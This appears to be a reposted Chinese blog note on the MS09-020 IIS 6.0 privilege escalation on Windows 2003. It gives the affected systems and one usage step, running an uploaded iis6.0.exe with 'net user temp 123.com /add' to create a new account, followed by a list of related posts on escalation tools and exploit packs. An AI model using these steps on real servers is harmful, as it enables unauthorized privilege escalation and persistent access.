MS09-020 iis6.0提权

最新推荐文章于 2022-07-04 20:27:51 发布
最新推荐文章于 2022-07-04 20:27:51 发布
阅读量396 收藏
点赞数
原文链接:http://www.cnblogs.com/feizianquan/p/10930380.html
版权
漏洞编号:MS09-020
披露日期: 2009/6/9
受影响的操作系统:Windows 2003 x64 sp1 sp2;XP;
测试系统:windows 2003 x64
 
上传

执行 iis6.0.exe  "net user temp 123.com /add"

net user

 

转载于:https://www.cnblogs.com/feizianquan/p/10930380.html

weixin_30564901
关注
史上最全的IIS6.0完整安装包550个文件解决缺失文件问题
08-30
HTTPAPI.DL_,HTTPEXT.DL_,HTTPMB51.DL_,HTTPMIB.DL_,HTTPOD51.DL_,HTTPODBC.DL_,IASPERF.DL_,IASPERF.H_,IASPERF.IN_,IASPOLCY.DL_,IEWEBHLP.CH_,IIRSP.SY_,IIS.DL_,IIS.IN_,IIS.MS_,IIS6.CAB,iisadmin.dll,IISADMIN...
使用MS09-020漏洞提权拿服务器
大方子
07-21 1197
metasploit MS09_050
WTleaf的博客
11-30 3750
攻击机:kali2.0 靶机:Windows 2008 使用软件:metasploit
网安实训(十)| Ms12-020 漏洞复现
朔方鸟的博客
02-19 5616
Ms12-020是针对Windows系统的远程桌面协议的漏洞,通过该漏洞,攻击者可通过对目标系统发送特定内容造成系统蓝屏故障。 实验将利用Metasploit进行MS12-020漏洞的复现和攻击。
利用IIS6提权获得管理员权限
Sea_Sand息禅
12-11 1019
IIS6也是一个比较古老的提权EXP了,是通过利用WMI的权限来执行命令。 目标机:漏洞巨多的Win2003 下面说一下通过IIS6在已用菜刀连接上的服务器上运用IIS6获得管理员权限的过程。 1.将cmd和IIS6上传到已用菜刀控制的服务器上。 2.用cmd打开虚拟终端。 3.建立用户并添加到管理员用户组 使用上传的cmd我们就直接拥有普通权限(可以用net user、who...
windows提权常用系统漏洞与对应的补丁编号
sweelg的博客
05-29 4502
CVE-2021-1732[Windows Win32k 提权漏洞] (Windows 10, 2019/20H2) CVE-2020-0787【Windows后台智能传输服务提权漏洞】(Windows 7/8/10、2008/2012/2016/2019) CVE-2020-0796[Microsoft 服务器消息块 3.1.1 (SMBv3) 协议处理某些请求的方式中存在一个远程代码执行漏洞,即“Windows SMBv3 客户端/服务器远程代码执行漏洞”] (Windows 1903/1909..
Windows 2003 IIS 6.0 搭建可建虚拟机的asp+.net+php+jsp+mysql+mssql
10-01
根据给定的信息,本文将详细解释如何在Windows 2003系统上配置IIS 6.0,并进一步实现一个支持ASP、.NET、PHP、JSP、MySQL以及MS SQL等多语言和数据库环境的虚拟机搭建过程。下面将按照步骤进行详细说明。 ### 一、...
提权大合集(服务器安全测试工具包)
11-27
提权大合集(服务器安全测试工具包)】是一个集合了多种安全测试工具的压缩文件,包含了163个XDay工具,旨在帮助用户进行服务器的安全检测。XDay工具通常指的是那些针对最新或者未公开的安全漏洞的利用工具,由于...
IIS中FTP设置用户和密码_实现多用户管理
12-05
实现 Serv-U 中的链接功能是利用路径解析原理实现的,算得上是 MS-FTP 的一个隐藏功能。首先在 FTP 站点根目录下创建一个文件夹,名为 tools,在 IIS 管理器中,在 FTP 站点下创建一个虚拟目录,名为 tools,路径...
精英影视系统 v6.0 免费版 -ASP源码.zip
01-23
在实际部署和使用【精英影视系统 v6.0】时,开发者需要具备一定的ASP编程知识,熟悉IIS(Internet Information Services)等ASP支持的Web服务器环境配置。同时,为了确保系统稳定运行和数据安全,还需要了解数据库...
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用)
11-07
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用) [网上流传版]MS12-020 PoC[bug修正版 + 数据包nc发送版] [个人版]ms12-020 Ruby,Python,EXE,DAT,NC一应俱全
iis6.0提权
09-23
用法iis6up "you command" .
iis6提权_iis6提权工具.exe
09-20
iis6提权_iis6提权工具.exe 亲自试用过,只适合iis6,对于高版本不支持
最新IIS6提权工具
06-19
最新IIS6提权工具最新IIS6提权工具最新IIS6提权工具最新IIS6提权工具
IIS6提权工具
10-18
很好用的IIS6提权工具 获取WEBSHELL后只要可以支持CMD基本可以拿到权限
Windows提权实战——————1、IIS6.exe提权实战
Fly_鹏程万里
05-14 4770
前言本次iis6.exe提权是利用iis6.0远程代码执行漏洞获取到一个Meterpreter之后,进行的提权操作。一切的提权都是基于一个webshell之后进行的后渗透测试,所以不论你的环境如何,只有你有一个WEBshell,之后你就可以进行相应的提权操作,但是对于IIS6.exe来说,它主要针对的含有是IIS6服务的主机进行的。iis6.0漏洞利用目标主机:Windows server 200...
2021-06-01Windows提权IIS6.0溢出提权
qq_45290991的博客
06-01 647
          操作系统漏洞提权:                systeminfo                查看未修补的补丁编号                KB952004 MS09-012  
108.网络安全渗透测试—[权限提升篇6]—[Windows内核溢出提权]
qwsn
07-04 2686
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! window 服务器常用的是win2003、win2008和win2012。在渗透测试中 ,我们获取的权限是iis_user用户组 ,要更高的权限就需要把当前的用户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中,扩大范围测试。 在iis里面,权限依次的大小对比:,aspx默认能执行终端命令、php和asp如果不能执行命令,在wscript.shell组件没有删除的情况下,可以上传c
Windows 提权------IIS6.exe溢出提权
selecthch的博客
06-26 3946
提权方式:          操作系统漏洞提权:               systeminfo               查看未修补的补丁编号               KB952004 MS09-012        PR    -pr.exe               KB956572 MS09-012        巴西烤肉               KB970483 MS09-...
Windows 2003 Server IIS6.0与Server-U 10 FTP服务器配置指南
"该资源是一篇关于在Windows Server 2003上配置IIS6.0和Server-U FTP服务器的教程。" 在Windows Server 2003操作系统中,Internet Information Services (IIS) 6.0是内置的Web服务器,用于托管网站和Web应用程序。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值